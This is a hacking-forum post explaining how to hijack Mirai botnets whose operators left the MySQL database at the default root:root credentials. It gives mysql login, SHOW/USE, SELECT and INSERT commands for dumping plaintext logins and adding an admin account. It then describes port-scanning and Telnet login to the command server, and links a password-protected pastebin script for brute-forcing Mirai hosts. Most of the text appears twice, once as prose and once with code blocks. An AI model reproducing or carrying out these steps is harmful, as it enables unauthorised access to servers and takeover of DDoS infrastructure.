OP 18 October, 2021 - 07:20 PM
The mirai botnet uses a mysql database for username information. Most of you I'm assuming are competent at setting up a mysql database, but skids who follow youtube tutorials have no clue what a mysql database even is. In fact, following the youtube monkey see monkey do tutorials will have you setup your database with the default credentials hardcoded into the mirai source code:root root
This means if you know the C2 IP of a mirai botnet, you can try to login to mysql on default port 3306 using root:root
From there you can find the botnet database:
From there you can list all usernames/passwords which are stored in plaintext in Mirai, or inject your own login with admin permissions
When you done this, do a simple TCP portscan to find the C2 port, connect with Telnet, and login with your username and password.
After that you should find Mirai IPs, simply search the tags field for Mirai
I have python script to scrape and brute Mirai IPs
You can find it here: https://pastebin.com/xBXJTHwx
Password: eZQDG93XP9
The only problem with this method is URLhaus reports. If someone is stupid enough to have their database credentials set as root:root, they they are probably not smart enough to use bulletproof hosting. This means once a C2 is on urlhaus, it probably will be taken down within the hour.
I have seen badpackets.net has a Mirai DDoS malware host list, but I have not used this and it requires payment to access.
This means if you know the C2 IP of a mirai botnet, you can try to login to mysql on default port 3306 using root:root
Code:
[b]mysql -h mirai.c2.host -uroot -proot[/b]
From there you can find the botnet database:
Code:
[b]SHOW DATABASES;
USE BOTNETDB --It will be pretty obvious which is the botnet db[/b]
From there you can list all usernames/passwords which are stored in plaintext in Mirai, or inject your own login with admin permissions
Code:
[b]SELECT * FROM users;
INSERT INTO users VALUES (NULL, 'newusername', 'newpassword', 0, 0, 0, 0, -1, 1, 30, '');[/b]
When you done this, do a simple TCP portscan to find the C2 port, connect with Telnet, and login with your username and password.
After that you should find Mirai IPs, simply search the tags field for Mirai
I have python script to scrape and brute Mirai IPs
You can find it here: https://pastebin.com/xBXJTHwx
Password: eZQDG93XP9
The only problem with this method is URLhaus reports. If someone is stupid enough to have their database credentials set as root:root, they they are probably not smart enough to use bulletproof hosting. This means once a C2 is on urlhaus, it probably will be taken down within the hour.
I have seen badpackets.net has a Mirai DDoS malware host list, but I have not used this and it requires payment to access.
Don't Forget the Like Button